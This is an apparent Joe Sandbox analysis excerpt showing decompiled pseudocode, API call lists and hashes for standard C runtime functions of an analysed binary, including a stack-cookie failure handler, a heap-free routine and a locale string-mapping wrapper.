                                                                      • Instruction Fuzzy Hash: 33F0AF71504344AAE7208E16CC84B62FB98EB52324F18C55AED485E282C3799C45CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 005C395B
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 005C3970
                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 005C397B
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 005C3997
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 005C399E
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction ID: 22fba8d3c41ff612bd4aa68ddee945db432e49274acbb31115b19e3f1feb08e9
                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction Fuzzy Hash: 5F21D2B9A01204EFD720DFA4E94A7457FB0FB08356F804079E50D87662E7B86A82CF5D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 85%
                                                                      			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                      				intOrPtr _v0;
                                                                      				void* _v804;
                                                                      				intOrPtr _v808;
                                                                      				intOrPtr _v812;
                                                                      				intOrPtr _t6;
                                                                      				intOrPtr _t11;
                                                                      				intOrPtr _t12;
                                                                      				intOrPtr _t13;
                                                                      				long _t17;
                                                                      				intOrPtr _t21;
                                                                      				intOrPtr _t22;
                                                                      				intOrPtr _t25;
                                                                      				intOrPtr _t26;
                                                                      				intOrPtr _t27;
                                                                      				intOrPtr* _t31;
                                                                      				void* _t34;
                                                                      
                                                                      				_t27 = __esi;
                                                                      				_t26 = __edi;
                                                                      				_t25 = __edx;
                                                                      				_t22 = __ecx;
                                                                      				_t21 = __ebx;
                                                                      				_t6 = __eax;
                                                                      				_t34 = _t22 -  *0x422234; // 0x7c4c350d
                                                                      				if(_t34 == 0) {
                                                                      					asm("repe ret");
                                                                      				}
                                                                      				 *0x423b98 = _t6;
                                                                      				 *0x423b94 = _t22;
                                                                      				 *0x423b90 = _t25;
                                                                      				 *0x423b8c = _t21;
                                                                      				 *0x423b88 = _t27;
                                                                      				 *0x423b84 = _t26;
                                                                      				 *0x423bb0 = ss;
                                                                      				 *0x423ba4 = cs;
                                                                      				 *0x423b80 = ds;
                                                                      				 *0x423b7c = es;
                                                                      				 *0x423b78 = fs;
                                                                      				 *0x423b74 = gs;
                                                                      				asm("pushfd");
                                                                      				_pop( *0x423ba8);
                                                                      				 *0x423b9c =  *_t31;
                                                                      				 *0x423ba0 = _v0;
                                                                      				 *0x423bac =  &_a4;
                                                                      				 *0x423ae8 = 0x10001;
                                                                      				_t11 =  *0x423ba0; // 0x0
                                                                      				 *0x423a9c = _t11;
                                                                      				 *0x423a90 = 0xc0000409;
                                                                      				 *0x423a94 = 1;
                                                                      				_t12 =  *0x422234; // 0x7c4c350d
                                                                      				_v812 = _t12;
                                                                      				_t13 =  *0x422238; // 0x83b3caf2
                                                                      				_v808 = _t13;
                                                                      				 *0x423ae0 = IsDebuggerPresent();
                                                                      				_push(1);
                                                                      				E004138FC(_t14);
                                                                      				SetUnhandledExceptionFilter(0);
                                                                      				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                      				if( *0x423ae0 == 0) {
                                                                      					_push(1);
                                                                      					E004138FC(_t17);
                                                                      				}
                                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                      			}



















                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce09
                                                                      0x0040ce0f
                                                                      0x0040ce11
                                                                      0x0040ce11
                                                                      0x00413644
                                                                      0x00413649
                                                                      0x0041364f
                                                                      0x00413655
                                                                      0x0041365b
                                                                      0x00413661
                                                                      0x00413667
                                                                      0x0041366e
                                                                      0x00413675
                                                                      0x0041367c
                                                                      0x00413683
                                                                      0x0041368a
                                                                      0x00413691
                                                                      0x00413692
                                                                      0x0041369b
                                                                      0x004136a3
                                                                      0x004136ab
                                                                      0x004136b6
                                                                      0x004136c0
                                                                      0x004136c5
                                                                      0x004136ca
                                                                      0x004136d4
                                                                      0x004136de
                                                                      0x004136e3
                                                                      0x004136e9
                                                                      0x004136ee
                                                                      0x004136fa
                                                                      0x004136ff
                                                                      0x00413701
                                                                      0x00413709
                                                                      0x00413714
                                                                      0x00413721
                                                                      0x00413723
                                                                      0x00413725
                                                                      0x0041372a
                                                                      0x0041373e

                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 2579439406-0
                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E0040ADB0(intOrPtr* __ecx) {
                                                                      				void* _t5;
                                                                      				intOrPtr* _t11;
                                                                      
                                                                      				_t11 = __ecx;
                                                                      				_t5 =  *(__ecx + 8);
                                                                      				 *__ecx = 0x41eff0;
                                                                      				if(_t5 != 0) {
                                                                      					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                      				}
                                                                      				if( *(_t11 + 0xc) != 0) {
                                                                      					_t5 = GetProcessHeap();
                                                                      					if(_t5 != 0) {
                                                                      						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                      					}
                                                                      				}
                                                                      				return _t5;
                                                                      			}





                                                                      0x0040adb3
                                                                      0x0040adb5
                                                                      0x0040adb8
                                                                      0x0040adc0
                                                                      0x0040adc8
                                                                      0x0040adc8
                                                                      0x0040adce
                                                                      0x0040add0
                                                                      0x0040add8
                                                                      0x00000000
                                                                      0x0040ade1
                                                                      0x0040add8
                                                                      0x0040ade8

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Heap$FreeProcess
                                                                      • String ID:
                                                                      • API String ID: 3859560861-0
                                                                      • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                      • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                      • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                      • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_5b0000_amMl.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction ID: f95322f5e4a5fc3ce7f63fc076719aa5c883553e75ce8ba48214bc128ce0e291
                                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                      • Instruction Fuzzy Hash: 6A01AD76A006048FDF21DF64C805BEB37E9FB86316F4945A9D90A9B2C2E774B9418B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                      				signed int _v8;
                                                                      				int _v12;
                                                                      				int _v16;
                                                                      				int _v20;
                                                                      				intOrPtr _v24;
                                                                      				void* _v36;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t110;
                                                                      				intOrPtr _t112;
                                                                      				intOrPtr _t113;
                                                                      				short* _t115;
                                                                      				short* _t116;
                                                                      				char* _t120;
                                                                      				short* _t121;
                                                                      				short* _t123;
                                                                      				short* _t127;
                                                                      				int _t128;
                                                                      				short* _t141;
                                                                      				signed int _t144;
                                                                      				void* _t146;
                                                                      				short* _t147;
                                                                      				signed int _t150;
                                                                      				short* _t153;
                                                                      				char* _t157;
                                                                      				int _t160;
                                                                      				long _t162;
                                                                      				signed int _t174;
                                                                      				signed int _t178;
                                                                      				signed int _t179;
                                                                      				int _t182;
                                                                      				short* _t184;
                                                                      				signed int _t186;
                                                                      				signed int _t188;
                                                                      				short* _t189;
                                                                      				int _t191;
                                                                      				intOrPtr _t194;
                                                                      				int _t207;
                                                                      
                                                                      				_t110 =  *0x422234; // 0x7c4c350d
                                                                      				_v8 = _t110 ^ _t188;
                                                                      				_t184 = __ecx;
                                                                      				_t194 =  *0x423e7c; // 0x1
                                                                      				if(_t194 == 0) {
                                                                      					_t182 = 1;
                                                                      					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                      						_t162 = GetLastError();
                                                                      						__eflags = _t162 - 0x78;
                                                                      						if(_t162 == 0x78) {
                                                                      							 *0x423e7c = 2;
                                                                      						}
                                                                      					} else {
                                                                      						 *0x423e7c = 1;
                                                                      					}
                                                                      				}
                                                                      				if(_a16 <= 0) {
                                                                      					L13:
                                                                      					_t112 =  *0x423e7c; // 0x1
                                                                      					if(_t112 == 2 || _t112 == 0) {
                                                                      						_v16 = 0;
                                                                      						_v20 = 0;
                                                                      						__eflags = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                      						}
                                                                      						__eflags = _a28;
                                                                      						if(_a28 == 0) {
                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                      						}
                                                                      						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                                      						_v24 = _t113;
                                                                      						__eflags = _t113 - 0xffffffff;
                                                                      						if(_t113 != 0xffffffff) {
                                                                      							__eflags = _t113 - _a28;
                                                                      							if(_t113 == _a28) {
                                                                      								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                      								L78:
                                                                      								__eflags = _v16;
                                                                      								if(__eflags != 0) {
                                                                      									_push(_v16);
                                                                      									E0040B6B5(0, _t182, _t184, __eflags);
                                                                      								}
                                                                      								_t115 = _v20;
                                                                      								__eflags = _t115;
                                                                      								if(_t115 != 0) {
                                                                      									__eflags = _a20 - _t115;
                                                                      									if(__eflags != 0) {
                                                                      										_push(_t115);
                                                                      										E0040B6B5(0, _t182, _t184, __eflags);
                                                                      									}
                                                                      								}
                                                                      								_t116 = _t184;
                                                                      								goto L84;
                                                                      							}
                                                                      							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                      							_t191 =  &(_t189[0xc]);
                                                                      							_v16 = _t120;
                                                                      							__eflags = _t120;
                                                                      							if(_t120 == 0) {
                                                                      								goto L58;
                                                                      							}
                                                                      							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                      							_v12 = _t121;
                                                                      							__eflags = _t121;
                                                                      							if(__eflags != 0) {
                                                                      								if(__eflags <= 0) {
                                                                      									L71:
                                                                      									_t182 = 0;
                                                                      									__eflags = 0;
                                                                      									L72:
                                                                      									__eflags = _t182;
                                                                      									if(_t182 == 0) {
                                                                      										goto L62;
                                                                      									}
                                                                      									E0040BA30(_t182, _t182, 0, _v12);
                                                                      									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                      									_v12 = _t123;
                                                                      									__eflags = _t123;
                                                                      									if(_t123 != 0) {
                                                                      										_t186 = E00417A69(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                      										_v20 = _t186;
                                                                      										asm("sbb esi, esi");
                                                                      										_t184 =  ~_t186 & _v12;
                                                                      										__eflags = _t184;
                                                                      									} else {
                                                                      										_t184 = 0;
                                                                      									}
                                                                      									E004147AE(_t182);
                                                                      									goto L78;
                                                                      								}
                                                                      								__eflags = _t121 - 0xffffffe0;
                                                                      								if(_t121 > 0xffffffe0) {
                                                                      									goto L71;
                                                                      								}
                                                                      								_t127 =  &(_t121[4]);
                                                                      								__eflags = _t127 - 0x400;
                                                                      								if(_t127 > 0x400) {
                                                                      									_t128 = E0040B84D(0, _t179, _t182, _t127);
                                                                      									__eflags = _t128;
                                                                      									if(_t128 != 0) {
                                                                      										 *_t128 = 0xdddd;
                                                                      										_t128 = _t128 + 8;
                                                                      										__eflags = _t128;
                                                                      									}
                                                                      									_t182 = _t128;
                                                                      									goto L72;
                                                                      								}
                                                                      								E0040CFB0(_t127);
                                                                      								_t182 = _t191;
                                                                      								__eflags = _t182;
                                                                      								if(_t182 == 0) {
                                                                      									goto L62;
                                                                      								}
                                                                      								 *_t182 = 0xcccc;
                                                                      								_t182 = _t182 + 8;
                                                                      								goto L72;
                                                                      							}
                                                                      							L62:
                                                                      							_t184 = 0;
                                                                      							goto L78;
                                                                      						} else {
                                                                      							goto L58;
                                                                      						}
                                                                      					} else {
                                                                      						if(_t112 != 1) {
                                                                      							L58:
                                                                      							_t116 = 0;
                                                                      							L84:
                                                                      							return E0040CE09(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                      						}
                                                                      						_v12 = 0;
                                                                      						if(_a28 == 0) {
                                                                      							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                      						}
                                                                      						_t184 = MultiByteToWideChar;
                                                                      						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                      						_t207 = _t182;
                                                                      						if(_t207 == 0) {
                                                                      							goto L58;
                                                                      						} else {
                                                                      							if(_t207 <= 0) {
                                                                      								L28:
                                                                      								_v16 = 0;
                                                                      								L29:
                                                                      								if(_v16 == 0) {
                                                                      									goto L58;
                                                                      								}
                                                                      								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                      									L52:
                                                                      									E004147AE(_v16);
                                                                      									_t116 = _v12;
                                                                      									goto L84;
                                                                      								}
                                                                      								_t184 = LCMapStringW;
                                                                      								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                      								_v12 = _t174;
                                                                      								if(_t174 == 0) {
                                                                      									goto L52;
                                                                      								}
                                                                      								if((_a8 & 0x00000400) == 0) {
                                                                      									__eflags = _t174;
                                                                      									if(_t174 <= 0) {
                                                                      										L44:
                                                                      										_t184 = 0;
                                                                      										__eflags = 0;
                                                                      										L45:
                                                                      										__eflags = _t184;
                                                                      										if(_t184 != 0) {
                                                                      											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                      											__eflags = _t141;
                                                                      											if(_t141 != 0) {
                                                                      												_push(0);
                                                                      												_push(0);
                                                                      												__eflags = _a24;
                                                                      												if(_a24 != 0) {
                                                                      													_push(_a24);
                                                                      													_push(_a20);
                                                                      												} else {
                                                                      													_push(0);
                                                                      													_push(0);
                                                                      												}
                                                                      												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                      											}
                                                                      											E004147AE(_t184);
                                                                      										}
                                                                      										goto L52;
                                                                      									}
                                                                      									_t144 = 0xffffffe0;
                                                                      									_t179 = _t144 % _t174;
                                                                      									__eflags = _t144 / _t174 - 2;
                                                                      									if(_t144 / _t174 < 2) {
                                                                      										goto L44;
                                                                      									}
                                                                      									_t52 = _t174 + 8; // 0x8
                                                                      									_t146 = _t174 + _t52;
                                                                      									__eflags = _t146 - 0x400;
                                                                      									if(_t146 > 0x400) {
                                                                      										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                      										__eflags = _t147;
                                                                      										if(_t147 != 0) {
                                                                      											 *_t147 = 0xdddd;
                                                                      											_t147 =  &(_t147[4]);
                                                                      											__eflags = _t147;
                                                                      										}
                                                                      										_t184 = _t147;
                                                                      										goto L45;
                                                                      									}
                                                                      									E0040CFB0(_t146);
                                                                      									_t184 = _t189;
                                                                      									__eflags = _t184;
                                                                      									if(_t184 == 0) {
                                                                      										goto L52;
                                                                      									}
                                                                      									 *_t184 = 0xcccc;
                                                                      									_t184 =  &(_t184[4]);
                                                                      									goto L45;
                                                                      								}
                                                                      								if(_a24 != 0 && _t174 <= _a24) {
                                                                      									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                      								}
                                                                      								goto L52;
                                                                      							}
                                                                      							_t150 = 0xffffffe0;
                                                                      							_t179 = _t150 % _t182;
                                                                      							if(_t150 / _t182 < 2) {
                                                                      								goto L28;
                                                                      							}
                                                                      							_t25 = _t182 + 8; // 0x8
                                                                      							_t152 = _t182 + _t25;
                                                                      							if(_t182 + _t25 > 0x400) {
                                                                      								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                      								__eflags = _t153;
                                                                      								if(_t153 == 0) {
                                                                      									L27:
                                                                      									_v16 = _t153;
                                                                      									goto L29;
                                                                      								}
                                                                      								 *_t153 = 0xdddd;
                                                                      								L26:
                                                                      								_t153 =  &(_t153[4]);
                                                                      								goto L27;
                                                                      							}
                                                                      							E0040CFB0(_t152);
                                                                      							_t153 = _t189;
                                                                      							if(_t153 == 0) {
                                                                      								goto L27;
                                                                      							}
                                                                      							 *_t153 = 0xcccc;
                                                                      							goto L26;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t178 = _a16;
                                                                      				_t157 = _a12;
                                                                      				while(1) {
                                                                      					_t178 = _t178 - 1;
                                                                      					if( *_t157 == 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t157 =  &(_t157[1]);
                                                                      					if(_t178 != 0) {
                                                                      						continue;
                                                                      					}
                                                                      					_t178 = _t178 | 0xffffffff;
                                                                      					break;
                                                                      				}
                                                                      				_t160 = _a16 - _t178 - 1;
                                                                      				if(_t160 < _a16) {
                                                                      					_t160 = _t160 + 1;
                                                                      				}
                                                                      				_a16 = _t160;
                                                                      				goto L13;
                                                                      			}











































                                                                      0x00417089
                                                                      0x00417090
                                                                      0x00417098
                                                                      0x0041709a
                                                                      0x004170a0
                                                                      0x004170a6
                                                                      0x004170bb
                                                                      0x004170c5
                                                                      0x004170cb
                                                                      0x004170ce
                                                                      0x004170d0
                                                                      0x004170d0
                                                                      0x004170bd
                                                                      0x004170bd
                                                                      0x004170bd
                                                                      0x004170bb
                                                                      0x004170dd
                                                                      0x00417101
                                                                      0x00417101
                                                                      0x00417109
                                                                      0x004172bb
                                                                      0x004172be
                                                                      0x004172c1
                                                                      0x004172c4
                                                                      0x004172cb
                                                                      0x004172cb
                                                                      0x004172ce
                                                                      0x004172d1
                                                                      0x004172d8
                                                                      0x004172d8
                                                                      0x004172de
                                                                      0x004172e4
                                                                      0x004172e7
                                                                      0x004172ea
                                                                      0x004172f3
                                                                      0x004172f6
                                                                      0x004173ef
                                                                      0x004173f1
                                                                      0x004173f1
                                                                      0x004173f4
                                                                      0x004173f6
                                                                      0x004173f9
                                                                      0x004173fe
                                                                      0x004173ff
                                                                      0x00417402
                                                                      0x00417404
                                                                      0x00417406
                                                                      0x00417409
                                                                      0x0041740b
                                                                      0x0041740c
                                                                      0x00417411
                                                                      0x00417409
                                                                      0x00417412
                                                                      0x00000000
                                                                      0x00417412
                                                                      0x00417309
                                                                      0x0041730e
                                                                      0x00417311
                                                                      0x00417314
                                                                      0x00417316
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041732a
                                                                      0x0041732c
                                                                      0x0041732f
                                                                      0x00417331
                                                                      0x0041733a
                                                                      0x00417379
                                                                      0x00417379
                                                                      0x00417379
                                                                      0x0041737b
                                                                      0x0041737b
                                                                      0x0041737d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417384
                                                                      0x0041739c
                                                                      0x0041739e
                                                                      0x004173a1
                                                                      0x004173a3
                                                                      0x004173bf
                                                                      0x004173c1
                                                                      0x004173c9
                                                                      0x004173cb
                                                                      0x004173cb
                                                                      0x004173a5
                                                                      0x004173a5
                                                                      0x004173a5
                                                                      0x004173cf
                                                                      0x00000000
                                                                      0x004173d4
                                                                      0x0041733c
                                                                      0x0041733f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417341
                                                                      0x00417344
                                                                      0x00417349
                                                                      0x00417362
                                                                      0x00417368
                                                                      0x0041736a
                                                                      0x0041736c
                                                                      0x00417372
                                                                      0x00417372
                                                                      0x00417372
                                                                      0x00417375
                                                                      0x00000000
                                                                      0x00417375
                                                                      0x0041734b
                                                                      0x00417350
                                                                      0x00417352
                                                                      0x00417354
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417356
                                                                      0x0041735c
                                                                      0x00000000
                                                                      0x0041735c
                                                                      0x00417333
                                                                      0x00417333
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417117
                                                                      0x0041711a
                                                                      0x004172ec
                                                                      0x004172ec
                                                                      0x00417414
                                                                      0x00417425
                                                                      0x00417425
                                                                      0x00417120
                                                                      0x00417126
                                                                      0x0041712d
                                                                      0x0041712d
                                                                      0x00417130
                                                                      0x00417153
                                                                      0x00417155
                                                                      0x00417157
                                                                      0x00000000
                                                                      0x0041715d
                                                                      0x0041715d
                                                                      0x004171a2
                                                                      0x004171a2
                                                                      0x004171a5
                                                                      0x004171a8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004171c1
                                                                      0x004172aa
                                                                      0x004172ad
                                                                      0x004172b2
                                                                      0x00000000
                                                                      0x004172b5
                                                                      0x004171c7
                                                                      0x004171db
                                                                      0x004171dd
                                                                      0x004171e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004171ef
                                                                      0x0041721a
                                                                      0x0041721c
                                                                      0x00417263
                                                                      0x00417263
                                                                      0x00417263
                                                                      0x00417265
                                                                      0x00417265
                                                                      0x00417267
                                                                      0x00417277
                                                                      0x0041727d
                                                                      0x0041727f
                                                                      0x00417281
                                                                      0x00417282
                                                                      0x00417283
                                                                      0x00417286
                                                                      0x0041728c
                                                                      0x0041728f
                                                                      0x00417288
                                                                      0x00417288
                                                                      0x00417289
                                                                      0x00417289
                                                                      0x004172a0
                                                                      0x004172a0
                                                                      0x004172a4
                                                                      0x004172a9
                                                                      0x00000000
                                                                      0x00417267
                                                                      0x00417222
                                                                      0x00417223
                                                                      0x00417225
                                                                      0x00417228
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041722a
                                                                      0x0041722a
                                                                      0x0041722e
                                                                      0x00417233
                                                                      0x0041724c
                                                                      0x00417252
                                                                      0x00417254
                                                                      0x00417256
                                                                      0x0041725c
                                                                      0x0041725c
                                                                      0x0041725c
                                                                      0x0041725f
                                                                      0x00000000
                                                                      0x0041725f
                                                                      0x00417235
                                                                      0x0041723a
                                                                      0x0041723c
                                                                      0x0041723e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417240
                                                                      0x00417246
                                                                      0x00000000
                                                                      0x00417246
                                                                      0x004171f4
                                                                      0x00417213
                                                                      0x00417213
                                                                      0x00000000
                                                                      0x004171f4
                                                                      0x00417163
                                                                      0x00417164
                                                                      0x00417169
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041716b
                                                                      0x0041716b
                                                                      0x00417174
                                                                      0x0041718a
                                                                      0x00417190
                                                                      0x00417192
                                                                      0x0041719d
                                                                      0x0041719d
                                                                      0x00000000
                                                                      0x0041719d
                                                                      0x00417194
                                                                      0x0041719a
                                                                      0x0041719a
                                                                      0x00000000
                                                                      0x0041719a
                                                                      0x00417176
                                                                      0x0041717b
                                                                      0x0041717f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00417181
                                                                      0x00000000
                                                                      0x00417181
                                                                      0x00417157
                                                                      0x00417109
                                                                      0x004170df
                                                                      0x004170e2
                                                                      0x004170e5
                                                                      0x004170e5
                                                                      0x004170e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004170ea
                                                                      0x004170ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004170ef
                                                                      0x00000000
                                                                      0x004170ef
                                                                      0x004170f7
                                                                      0x004170fb
                                                                      0x004170fd
                                                                      0x004170fd
                                                                      0x004170fe
                                                                      0x00000000

                                                                      APIs
                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,022418A8), ref: 004170C5
                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                      • __freea.LIBCMT ref: 004172A4
                                                                      • __freea.LIBCMT ref: 004172AD
                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                      • _malloc.LIBCMT ref: 00417362
                                                                      • _memset.LIBCMT ref: 00417384
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                      • __freea.LIBCMT ref: 004173CF
                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.366895867.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.366895867.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File
